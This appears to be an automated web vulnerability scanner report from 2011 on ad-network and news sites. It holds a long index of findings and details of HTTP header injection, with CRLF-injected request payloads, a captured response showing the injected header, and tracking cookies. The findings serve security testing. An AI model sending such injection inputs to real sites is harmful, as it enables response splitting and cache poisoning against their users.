11.49. http://r1-ads.ace.advertising.com/site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm

11.50. http://segment-pixel.invitemedia.com/pixel

11.51. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544434

11.52. http://sitelife.usatoday.com/ver1.0/Content/images/no-user-image.gif

11.53. http://sitelife.usatoday.com/ver1.0/Content/images/store/0/4/10516936-900e-4800-949f-6bf88e9054a7.P4Avatar.jpg

11.54. http://sitelife.usatoday.com/ver1.0/Content/images/store/0/6/409d4e2c-128c-4123-962d-2682bb7c58c3.P4Avatar.gif

11.55. http://sitelife.usatoday.com/ver1.0/Content/images/store/12/3/0c59ddcb-14b2-4a24-83ef-b67cd107c524.P4Avatar.jpg

11.56. http://sitelife.usatoday.com/ver1.0/Content/images/store/13/12/7db8438d-87d0-417f-bc4a-8ae8beafb554.P4Avatar.jpg

11.57. http://sitelife.usatoday.com/ver1.0/Content/images/store/2/8/22005321-8ed2-4f70-a8ee-77647e52878f.P4Avatar.gif

11.58. http://sitelife.usatoday.com/ver1.0/Content/images/store/8/4/78dbe245-8052-454f-8454-f58c95181887.P4Avatar.bmp

11.59. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png

11.60. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-background.png

11.61. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-hide.gif

11.62. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-show.gif

11.63. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif

11.64. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-blocked.gif

11.65. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-default.gif

11.66. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg

11.67. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg.jpg

11.68. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-last-bg.png

11.69. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-next-bg.png

11.70. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-left.png

11.71. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-right.png

11.72. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-report-icon.gif

11.73. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-reported-icon.gif

11.74. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/score/pluck-thumb-up-grayed.gif

11.75. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber.gif

11.76. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber_circle.gif

11.77. http://sitelife.usatoday.com/ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif

11.78. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/email/pluck-email-icon.gif

11.79. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/permalink/pluck-permalink-icon.gif

11.80. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif

11.81. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif

11.82. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-digg.gif

11.83. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-fb.gif

11.84. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-ff.gif

11.85. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif

11.86. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif

11.87. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif

11.88. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif

11.89. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif

11.90. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif

11.91. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif

11.92. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/checkplayer.js

11.93. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flXHR.js

11.94. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flensed.js

11.95. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js

11.96. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js

11.97. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/swfobject.js

11.98. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif

11.99. http://sitelife.usatoday.com/ver1.0/content/ua/css/pluckAll.css

11.100. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

11.101. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js

11.102. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js

11.103. http://syndication.mmismm.com/tntwo.php

11.104. http://tacoda.at.atwola.com/rtx/r.js

11.105. http://tags.bluekai.com/site/3775

11.106. http://tags.bluekai.com/site/3869

11.107. http://trc.taboolasyndication.com/usatoday/log/2/visible

11.108. http://trgc.opt.fimserve.com/fp.gif

11.109. http://trgca.opt.fimserve.com/fp.gif

11.110. http://va.px.invitemedia.com/adnxs_imp

11.111. http://www.groupon.com/dallas/

11.112. http://www.groupon.com/learn

11.113. http://www.groupon.com/mobile

11.114. http://www.groupon.com/privacy

11.115. http://www.groupon.com/subscriptions/new

11.116. https://www.groupon.com/dallas/

11.117. https://www.groupon.com/learn

11.118. https://www.groupon.com/login

11.119. https://www.groupon.com/mobile

11.120. https://www.groupon.com/users

11.121. https://www.groupon.com/users/new

11.122. http://www.hnedata.net/features/tr_stock_charts

11.123. http://www.tinbuadserv.com/v3/serve.php

12. Password field with autocomplete enabled

12.1. http://shop.npr.org/index.php

12.2. https://www.groupon.com/login

12.3. https://www.groupon.com/users/new

12.4. http://www.npr.org/templates/reg/

12.5. http://www.npr.org/templates/reg/login.php

12.6. http://www.therepublic.com/login/

12.7. http://www.therepublic.com/login/register/

13. Source code disclosure

13.1. http://assets1.grouponcdn.com/assets/application.js

13.2. http://assets1.grouponcdn.com/assets/subscriptions.js

14. ASP.NET debugging enabled

15. Referer-dependent response

15.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

15.2. http://480-adver-view.c3metrics.com/v.js

15.3. http://api.twitter.com/1/wvuefox8/lists/wvue-fox-8-3/statuses.json

15.4. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

15.5. http://jqueryui.com/ui/jquery.ui.widget.js

15.6. http://www.facebook.com/plugins/like.php

15.7. http://www.facebook.com/plugins/recommendations.php

15.8. http://www.fox8live.com/mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

15.9. https://www.groupon.com/users

16. Cross-domain POST

16.1. http://radar.weather.gov/Conus/index.php

16.2. http://radar.weather.gov/radar.php

16.3. http://www.csmonitor.com/Business

16.4. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down

17. Cross-domain Referer leakage

17.1. http://ad.amgdgt.com/ads/

17.2. http://ad.amgdgt.com/ads/

17.3. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10

17.4. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136

17.5. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8

17.6. http://ad.doubleclick.net/adj/N2883.6441.USATODAY.COM/B5327539.11

17.7. http://ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.15

17.8. http://ad.doubleclick.net/adj/invc.macroaxis/widget

17.9. http://ads.bridgetrack.com/a/f/

17.10. http://ads.pointroll.com/PortalServe/

17.11. http://ads.pointroll.com/PortalServe/

17.12. http://ads.pointroll.com/PortalServe/

17.13. http://ads.pointroll.com/PortalServe/

17.14. http://bidder.mathtag.com/iframe/notify

17.15. http://bidder.mathtag.com/iframe/notify

17.16. http://choices.truste.com/ca

17.17. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js

17.18. http://finance.fox8live.com/inergize.wvue

17.19. http://fls.doubleclick.net/activityi

17.20. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH

17.21. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH

17.22. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH

17.23. http://googleads.g.doubleclick.net/pagead/ads

17.24. http://ib.adnxs.com/ptj

17.25. http://ib.adnxs.com/ptj

17.26. http://login.npr.org/openid/embed

17.27. http://radar.weather.gov/radar.php

17.28. http://shop.npr.org/

17.29. http://widgets.macroaxis.com/widgets/partnerMarketsIntradaySnap.jsp

17.30. http://wvue.web.entriq.net/nw/dpm/loadplayer/

17.31. http://www.facebook.com/plugins/like.php

17.32. http://www.facebook.com/plugins/recommendations.php

17.33. http://www.groupon.com/subscriptions/new

17.34. http://www.groupon.com/subscriptions/new

17.35. http://www.srh.noaa.gov/lmrfc/

18. Cross-domain script include

18.1. http://ad.amgdgt.com/ads/

18.2. http://ad.amgdgt.com/ads/

18.3. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10

18.4. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136

18.5. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8

18.6. http://bidder.mathtag.com/iframe/notify

18.7. http://bidder.mathtag.com/iframe/notify

18.8. http://content.usatoday.com/topics/reporter/Doyle+Rice

18.9. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js

18.10. http://finance.fox8live.com/inergize.wvue

18.11. http://googleads.g.doubleclick.net/pagead/ads

18.12. http://ib.adnxs.com/ptj

18.13. http://login.npr.org/openid/embed

18.14. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html

18.15. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html

18.16. http://r1-ads.ace.advertising.com/site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm

18.17. http://shop.npr.org/

18.18. http://shop.npr.org/spoken-word/npr-american-chronicles-the-civil-war/

18.19. http://widget.newsinc.com/_fw/therepublic/toppicks_republic_ent.html

18.20. http://widget.newsinc.com/_fw/therepublic/toppicks_republic_lif.html

18.21. http://widget.newsinc.com/_fw/therepublic/toppicks_republic_spt.html

18.22. http://widget.newsinc.com/_fw/therepublic/toppicks_republic_wld.html

18.23. http://widgets.macroaxis.com/widgets/partnerMarketsIntradaySnap.jsp

18.24. http://www.csmonitor.com/Business

18.25. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down

18.26. http://www.facebook.com/plugins/like.php

18.27. http://www.facebook.com/plugins/recommendations.php

18.28. http://www.fox8live.com/business/default.aspx

18.29. http://www.fox8live.com/business/iframe_financialticker.aspx

18.30. http://www.fox8live.com/business/iframe_indexwatch.aspx

18.31. http://www.fox8live.com/content/aboutus/default.aspx

18.32. http://www.fox8live.com/content/news/lee_zurik_investigation/default.aspx

18.33. http://www.fox8live.com/content/news/seregni/default.aspx

18.34. http://www.fox8live.com/content/news/watercooler/default.aspx

18.35. http://www.fox8live.com/default.aspx

18.36. http://www.fox8live.com/entertainment/horoscopes/default.aspx

18.37. http://www.fox8live.com/mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

18.38. http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx

18.39. http://www.fox8live.com/rss/default.aspx

18.40. http://www.fox8live.com/wireless/default.aspx

18.41. http://www.groupon.com/learn

18.42. http://www.groupon.com/mobile

18.43. http://www.groupon.com/privacy

18.44. http://www.groupon.com/rounded_bottom.png

18.45. http://www.groupon.com/subscriptions/new

18.46. https://www.groupon.com/login

18.47. https://www.groupon.com/users/new

18.48. http://www.hnedata.net/features/tr_stock_charts

18.49. http://www.natchezdemocrat.com/

18.50. http://www.therepublic.com/home/

18.51. http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm

19. TRACE method is enabled

19.1. http://amch.questionmarket.com/

19.2. http://bh.contextweb.com/

19.3. http://cdn.taboolasyndication.com/

19.4. http://chart.financialcontent.com/

19.5. http://image2.pubmatic.com/

19.6. http://matcher-apx.bidder7.mookie1.com/

19.7. http://matcher.bidder7.mookie1.com/

19.8. http://matcher.bidder8.mookie1.com/

19.9. http://metrics.csmonitor.com/

19.10. http://metrics.npr.org/

19.11. http://optimized-by.rubiconproject.com/

19.12. http://r.openx.net/

19.13. http://secure-us.imrworldwide.com/

19.14. http://t.mookie1.com/

19.15. http://tacoda.at.atwola.com/

19.16. http://tracker.bidder7.mookie1.com/

19.17. http://tracker.financialcontent.com/

19.18. http://trc.taboolasyndication.com/

19.19. http://usatoday1.112.2o7.net/

19.20. http://widgets.outbrain.com/

19.21. http://wvue.web.entriq.net/

19.22. http://www.collegesurfing.com/

19.23. http://www.npr.org/

19.24. http://www.srh.noaa.gov/

19.25. http://www.tinbuadserv.com/

20. Email addresses disclosed

20.1. http://radar.weather.gov/Conus/index.php

20.2. http://radar.weather.gov/radar.php

20.3. http://s.meebocdn.net/cim/script/cim_v92_cim_11_8_0.en.js

20.4. http://shop.npr.org/content/vendors/jquery/rater/jquery.rater-custom.js

20.5. http://www.fox8live.com/business/default.aspx

20.6. http://www.fox8live.com/content/aboutus/default.aspx

20.7. http://www.fox8live.com/content/news/lee_zurik_investigation/default.aspx

20.8. http://www.fox8live.com/content/news/seregni/default.aspx

20.9. http://www.fox8live.com/content/news/watercooler/default.aspx

20.10. http://www.fox8live.com/default.aspx

20.11. http://www.fox8live.com/mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

20.12. http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx

20.13. http://www.fox8live.com/wireless/default.aspx

20.14. http://www.groupon.com/privacy

20.15. https://www.groupon.com/login

20.16. http://www.macroaxis.com/widgets/url.jsp

20.17. http://www.natchezdemocrat.com/

20.18. http://www.npr.org/templates/javascript/generated/regPage.js

20.19. http://www.srh.noaa.gov/cte.htm

20.20. http://www.srh.noaa.gov/lmrfc/

20.21. http://www.srh.noaa.gov/lmrfc/quickbrief.php

20.22. http://www.srh.noaa.gov/srh.htm

20.23. http://www.therepublic.com/assets/gzip.php

20.24. http://www.therepublic.com/assets/scripts/menu/menu.js

20.25. http://www.therepublic.com/home/

20.26. http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm

21. Private IP addresses disclosed

21.1. http://static.ak.fbcdn.net/connect/xd_proxy.php

21.2. http://static.ak.fbcdn.net/rsrc.php/v1/zD/r/B4K_BWwP7P5.png

21.3. http://static.ak.fbcdn.net/rsrc.php/v1/ze/r/nZW4C56WJb6.png

21.4. http://www.facebook.com/extern/login_status.php

21.5. http://www.facebook.com/extern/login_status.php

21.6. http://www.facebook.com/extern/login_status.php

21.7. http://www.facebook.com/plugins/like.php

21.8. http://www.facebook.com/plugins/like.php

21.9. http://www.facebook.com/plugins/like.php

21.10. http://www.facebook.com/plugins/like.php

21.11. http://www.facebook.com/plugins/like.php

21.12. http://www.facebook.com/plugins/like.php

21.13. http://www.facebook.com/plugins/like.php

21.14. http://www.facebook.com/plugins/like.php

21.15. http://www.facebook.com/plugins/like.php

21.16. http://www.facebook.com/plugins/like.php

21.17. http://www.facebook.com/plugins/like.php

21.18. http://www.facebook.com/plugins/like.php

21.19. http://www.facebook.com/plugins/like.php

21.20. http://www.facebook.com/plugins/like.php

21.21. http://www.facebook.com/plugins/like.php

21.22. http://www.facebook.com/plugins/like.php

21.23. http://www.facebook.com/plugins/like.php

21.24. http://www.facebook.com/plugins/like.php

21.25. http://www.facebook.com/plugins/like.php

21.26. http://www.facebook.com/plugins/like.php

21.27. http://www.facebook.com/plugins/like.php

21.28. http://www.facebook.com/plugins/recommendations.php

21.29. http://www.facebook.com/plugins/recommendations.php

21.30. http://www.facebook.com/plugins/recommendations.php

22. Robots.txt file

22.1. http://ad.amgdgt.com/ads/

22.2. http://ad.doubleclick.net/pfadx/csmonitor_cim/

22.3. http://ads.pointroll.com/PortalServe/

22.4. http://amch.questionmarket.com/adscgen/sta.php

22.5. http://api.twitter.com/1/wvuefox8/lists/wvue-fox-8-3/statuses.json

22.6. http://assets1.grouponcdn.com/stylesheets/app/subscriptions/subscribe_2s208.css

22.7. http://at.amgdgt.com/ads/

22.8. http://atd.agencytradingdesk.net/WatsonTracker/IMP/A1000138/C1000187/P1003017/pixel.gif

22.9. http://b.scorecardresearch.com/b

22.10. http://b.voicefive.com/b

22.11. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

22.12. http://bidder.mathtag.com/iframe/notify

22.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs

22.14. http://cache-01.cleanprint.net/cp/psj

22.15. http://content.usatoday.com/apps/insidepage/crc.ashx

22.16. http://contextweb.usatoday.net/asp/Context/ContextWebHandler.ashx

22.17. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js

22.18. http://data.usatoday.net/apps/InsidePage

22.19. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_0/StdBannerEx.js

22.20. http://fls.doubleclick.net/activityi

22.21. http://gannett.gcion.com/addyn/3.0/5111.1/809057/0/-1/ADTECH

22.22. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1030881291/

22.23. http://i.usatoday.net/_common/_scripts/_community/lib/usl.photo.js

22.24. http://jqueryui.com/ui/jquery.ui.widget.js

22.25. http://l.addthiscdn.com/live/t00/250lo.gif

22.26. http://login.npr.org/openid/embed

22.27. http://map.media6degrees.com/orbserv/hbpix

22.28. http://metrics.csmonitor.com/b/ss/fcocscsm/1/H.21/s92332599295768

22.29. http://metrics.npr.org/b/ss/nprorg/1/H.17/s91303597942460

22.30. http://mobile.fox8live.com/BlackBerry/default.aspx

22.31. http://pagead2.googlesyndication.com/pagead/imgad

22.32. http://pixel.quantserve.com/pixel

22.33. http://pubads.g.doubleclick.net/gampad/ads

22.34. http://s0.2mdn.net/dot.gif

22.35. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYg4cDIIyHAyoFh8MAAD8yBYPDAAAP

22.36. http://safebrowsing.clients.google.com/safebrowsing/gethash

22.37. http://segment-pixel.invitemedia.com/pixel

22.38. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll

22.39. http://speed.pointroll.com/PointRoll/Media/Banners/Ford/861911/CommTruck_Season_2010_300x250_DFLT_101410.jpg

22.40. http://static.ak.fbcdn.net/connect/xd_proxy.php

22.41. http://stp.fox8live.com/common/pagereporting/nettracker/ntpagetag.gif

22.42. http://t.pointroll.com/PointRoll/Track/

22.43. http://toolbarqueries.clients.google.com/tbproxy/af/query

22.44. http://trc.taboolasyndication.com/usatoday/log/2/available

22.45. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s97032880377955

22.46. http://va.px.invitemedia.com/adnxs_imp

22.47. http://w10.localadbuy.com/servlet/ajrotator/550/0/vj

22.48. http://widgets.macroaxis.com/widgets/content.jsp

22.49. http://www.collegesurfing.com/searchbox-mge-us.php

22.50. http://www.csmonitor.com/Business

22.51. http://www.facebook.com/plugins/like.php

22.52. http://www.fox8live.com/business/default.aspx

22.53. http://www.google-analytics.com/__utm.gif

22.54. http://www.google.com/finance/chart

22.55. http://www.googleadservices.com/pagead/conversion/1030881291/

22.56. http://www.groupon.com/subscriptions/new

22.57. https://www.groupon.com/login

22.58. http://www.macroaxis.com/widgets/url.jsp

22.59. http://www.meebo.com/cmd/getrotate

22.60. http://www.natchezdemocrat.com/

22.61. http://www.npr.org/templates/reg

22.62. http://www.tinbuadserv.com/v3/serve.php

22.63. http://www.usatoday.com/weather/stormcenter/default.htm

23. Cacheable HTTPS response

23.1. https://shop.npr.org/favicon.ico

23.2. https://www.groupon.com/login

23.3. https://www.groupon.com/users/new

24. HTML does not specify charset

24.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

24.2. http://480-adver-view.c3metrics.com/v.js

24.3. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10

24.4. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136

24.5. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8

24.6. http://ad.doubleclick.net/pfadx/csmonitor_cim/

24.7. http://ads.bridgetrack.com/a/f/

24.8. http://ads.bridgetrack.com/ads_v2/script/btwrite.js

24.9. http://ads.pointroll.com/PortalServe/

24.10. http://amch.questionmarket.com/adscgen/sta.php

24.11. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

24.12. http://bidder.mathtag.com/iframe/notify

24.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs

24.14. http://fls.doubleclick.net/activityi

24.15. http://login.npr.org/openid/embed

24.16. http://odb.outbrain.com/utils/ping.html

24.17. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html

24.18. http://share.meebo.com/cim/whitev4.html

24.19. http://uac.advertising.com/wrapper/aceUACping.htm

24.20. http://wvue.web.entriq.net/nw/dpm/loadplayer/

24.21. http://www.fox8live.com/images/phone.png

24.22. http://www.fox8live.com/sites/scripps/images/rounding/tab-bg.gif

24.23. http://www.fox8live.com/sites/wvue/images/promos/fox8insider.jpg

24.24. http://www.therepublic.com/assets/images/ui-bg_flat_75_ffffff_40x100.png

24.25. http://www.therepublic.com/assets/images/ui-bg_glass_65_ffffff_1x400.png

24.26. http://www.therepublic.com/assets/images/ui-bg_glass_75_e6e6e6_1x400.png

24.27. http://www.usatoday.com/_common/_includes/_community/taboola-async.ssi

25. Content type incorrectly stated

25.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

25.2. http://480-adver-view.c3metrics.com/v.js

25.3. http://a1.interclick.com/getInPageJS.aspx

25.4. http://a1.interclick.com/getInPageJSProcess.aspx

25.5. http://ad.doubleclick.net/pfadx/csmonitor_cim/

25.6. http://adadvisor.net/adscores/g.js

25.7. http://ads.bridgetrack.com/ads_v2/script/btwrite.js

25.8. http://ads.pointroll.com/PortalServe/

25.9. http://amch.questionmarket.com/adscgen/sta.php

25.10. http://ar.voicefive.com/b/rc.pli

25.11. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.12. http://cdn.rpxnow.com/rel/js/28a35f3454bf56715fe8f8b20c5b1fff.js

25.13. http://contextweb.usatoday.net/asp/Context/ContextWebHandler.ashx

25.14. http://event.adxpose.com/event.flow

25.15. http://i.usatoday.net/_common/_scripts/_community/lib/usl.photo.js

25.16. http://mobile.fox8live.com/ScriptResource.axd

25.17. http://radar.weather.gov/Conus/images/favicon.ico

25.18. http://radar.weather.gov/images/favicon.ico

25.19. http://shop.npr.org/favicon.ico

25.20. http://shop.npr.org/resize.php

25.21. https://shop.npr.org/favicon.ico

25.22. https://shop.npr.org/resize.php

25.23. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

25.24. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll

25.25. http://trc.taboolasyndication.com/usatoday/trc/2/json

25.26. http://widgets.macroaxis.com/widgets/content.jsp

25.27. http://wvue.web.entriq.net/nw/dpm/loadplayer/

25.28. http://www.collegesurfing.com/js/MGEProgramCategoryDropDown.php

25.29. http://www.macroaxis.com/widgets/url.jsp

25.30. http://www.srh.noaa.gov/images/favicon.ico

25.31. http://www.usatoday.com/community/tags/GetLinkedByline.ashx

26. Content type is not specified

27. SSL certificate

27.1. https://shop.npr.org/

27.2. https://www.groupon.com/



1. HTTP header injection  next
There are 14 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://ad.doubleclick.net/ad/N4873.npr.og/B5461009 [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N4873.npr.og/B5461009

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8fdb9%0d%0a31e2c62f70f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8fdb9%0d%0a31e2c62f70f/N4873.npr.og/B5461009;sz=1x1;pc=[TPAS_ID];ord=0.699075760319829 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.pointroll.com/PortalServe/?pid=1278576G80420110421221132&cid=1472985&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b02/3/0/*/j%3B240265126%3B0-0%3B0%3B60978287%3B4307-300/250%3B41844694/41862481/1%3B%3B~sscs=%3F$CTURL$&time=1|10:39|-5&r=0.699075760319829&server=polRedir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8fdb9
31e2c62f70f
/N4873.npr.og/B5461009;sz=1x1;pc=[TPAS_ID];ord=0.699075760319829:
Date: Mon, 09 May 2011 15:40:16 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.2. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4300.Google/B5350353.10

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2d7db%0d%0ac78d659218b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2d7db%0d%0ac78d659218b/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=;ord=68443379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
